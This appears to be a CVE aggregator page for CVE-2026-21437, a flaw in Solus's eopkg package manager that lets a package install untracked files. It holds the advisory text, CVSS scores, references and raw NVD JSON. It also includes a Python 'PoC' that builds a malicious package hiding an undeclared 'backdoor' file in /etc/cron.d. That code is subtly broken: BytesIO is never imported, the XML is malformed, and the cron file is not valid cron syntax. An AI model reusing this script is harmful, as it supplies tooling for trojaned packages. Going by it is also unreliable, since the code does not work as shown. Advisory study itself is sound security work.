CVE-2026-21437

Description

eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could include files that are not tracked by `eopkg`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be shown by `lseopkg` and related tools. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:getsol:eopkg:*:*:*:*:*:python:*:* - VULNERABLE

Solus eopkg < 4.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21437 PoC - Malicious eopkg package with untracked files # This PoC demonstrates how a malicious package can include files not tracked by eopkg # Reference: https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d import os import tarfile import xml.etree.ElementTree as ET def create_malicious_package(): """ Create a malicious eopkg with untracked files The package.xml will only declare some files, but actual archive contains additional hidden files """ # Package metadata - only declares legitimate files package_xml = '''<?xml version="1.0" encoding="utf-8"?> <Package name="fake-package" version="1.0.0" release="1"> <Summary>Legitimate package description</Summary> <Description>A seemingly harmless package</Description> <Maintainer>Attacker <[email protected]></Maintainer> <License>GPL-3.0</License> <IsA>package</IsA> <PartOf>system.base</PartOf> <RuntimeDependencies/> <Files> <File>/usr/bin/legitimate-binary"> <Type>executable</Type> </File> </Files> </Package>''' # Create package archive with additional untracked files with tarfile.open('malicious.eopkg', 'w') as tar: # Add package metadata info = tarfile.TarInfo(name='install/package.xml') info.size = len(package_xml.encode()) tar.addfile(info, file=BytesIO(package_xml.encode())) # Add legitimate file (tracked) legitimate_file = b'#!/bin/bash\necho "Legitimate tool"' info = tarfile.TarInfo(name='install/usr/bin/legitimate-binary') info.size = len(legitimate_file) tar.addfile(info, file=BytesIO(legitimate_file)) # Add untracked malicious file (NOT declared in package.xml) # This file will be installed but not tracked by eopkg malicious_file = b'#!/bin/bash\n# Hidden backdoor - not tracked by lseopkg\nrm -f /tmp/.hidden_payload && /bin/bash' info = tarfile.TarInfo(name='install/etc/cron.d/malicious-backdoor') info.size = len(malicious_file) tar.addfile(info, file=BytesIO(malicious_file)) print('[+] Malicious package created: malicious.eopkg') print('[+] The backdoor file will not appear in lseopkg listings') # Vulnerable eopkg versions: < 4.4.0 # Fixed version: 4.4.0+ # Reference: https://github.com/getsolus/eopkg/releases/tag/v4.4.0

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21437
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21437
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21437/
[4] VulDB https://vuldb.com/cve/CVE-2026-21437
[5] https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d
[6] https://github.com/getsolus/eopkg/pull/201
[7] https://github.com/getsolus/eopkg/releases/tag/v4.4.0
[8] https://github.com/getsolus/eopkg/security/advisories/GHSA-hjp7-qwrj-6cc6

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21437", "sourceIdentifier": "[email protected]", "published": "2026-01-01T18:15:41.347", "lastModified": "2026-03-04T21:31:50.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "eopkg is a Solus package manager implemented in python3. In versions prior to 4.4.0, a malicious package could include files that are not tracked by `eopkg`. This requires the installation of a package from a malicious or compromised source. Files in such packages would not be shown by `lseopkg` and related tools. The issue has been fixed in v4.4.0. Users only installing packages from the Solus repositories are not affected."}, {"lang": "es", "value": "eopkg es un gestor de paquetes de Solus implementado en python3. En versiones anteriores a la 4.4.0, un paquete malicioso podría incluir archivos que no son rastreados por 'eopkg'. Esto requiere la instalación de un paquete de una fuente maliciosa o comprometida. Los archivos en dichos paquetes no serían mostrados por 'lseopkg' y herramientas relacionadas. El problema ha sido solucionado en la v4.4.0. Los usuarios que solo instalan paquetes de los repositorios de Solus no se ven afectados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:H/UI:A/VC:N/VI:L/VA:N/SC:N/SI:L/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-353"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getsol:eopkg:*:*:*:*:*:python:*:*", "versionEndExcluding": "4.4.0", "matchCriteriaId": "1E0EA986-0572-494D-A971-C2071C7E153A"}]}]}], "references": [{"url": "https://github.com/getsolus/eopkg/commit/e7694323ed64e08b5b4b108fff273c64125cd39d", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/getsolus/eopkg/pull/201", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/getsolus/eopkg/releases/tag/v4.4.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/getsolus/eopkg/security/advisories/GHSA-hjp7-qwrj-6cc6", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}